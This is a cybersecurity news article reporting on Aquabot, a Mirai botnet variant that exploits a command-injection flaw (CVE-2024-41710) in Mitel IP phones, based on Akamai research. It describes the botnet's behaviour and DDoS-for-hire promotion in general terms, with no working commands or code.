Recent developments in the cybersecurity landscape have revealed that a new variant of the Mirai botnet, known as Aquabot, is actively targeting a medium-severity vulnerability associated with Mitel IP phones. This vulnerability, identified as CVE-2024-41710, has a CVSS score of 6.8 and involves command injection during the phone’s boot process, allowing malicious actors to execute unauthorized commands.
Aquabot’s targeting includes a range of Mitel devices: the 6800 Series, 6900 Series, 6900w Series SIP Phones, and the Mitel 6970 Conference Unit. Mitel issued a security advisory addressing this vulnerability in July 2024, and a proof-of-concept exploit was made publicly available shortly thereafter.
In addition to CVE-2024-41710, Aquabot exploits several other vulnerabilities, including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution issue affecting Linksys E-series devices. According to researchers from Akamai, efforts to exploit CVE-2024-41710 have been observed since early January 2025, employing an attack method that closely mirrors the available proof-of-concept for deploying the botnet.
The attack mechanism involves executing a shell script utilizing the “wget” command to download Aquabot onto devices with various CPU architectures. This version of the Mirai variant represents a third iteration, introducing a new “report_kill” function that lets the command-and-control (C2) server know when a termination signal is detected on the infected device; however, no responses from the server have yet been recorded.
Aquabot is engineered to conduct C2 communications upon recognizing specific signals and disguises itself by renaming to “httpd.x86.” It is also programmed to terminate certain local processes, further typifying tactics that could be linked to stealthy operations or competition with alternative botnets. The organization behind Aquabot has allegedly promoted its network of compromised devices as a DDoS service on Telegram, under various aliases.
This situation underscores the ongoing threat posed by Mirai and its variants, particularly to internet-connected devices lacking adequate security measures, or those operating on outdated configurations with default passwords. The researchers indicated that many threat actors mislead the cybersecurity community by claiming their botnets are solely for DDoS testing, while analyses reveal a robust DDoS service advertisement.
In analyzing Aquabot’s tactics through the lens of the MITRE ATT&CK framework, initial access may involve exploiting known vulnerabilities in the affected devices. The attack reflects potential techniques including exploitation of remote services and command-and-control communication, which may facilitate further privilege escalation and persistence.
The ongoing evolution of the Mirai botnet highlights the pressing need for heightened cybersecurity awareness and proactive measures among businesses, particularly those deploying internet-connected devices. Addressing these vulnerabilities not only mitigates the risk of exploitation but also safeguards organizational assets against potential large-scale DDoS attacks.
To stay informed on cybersecurity threats, follow us on Google News, Twitter, and LinkedIn.
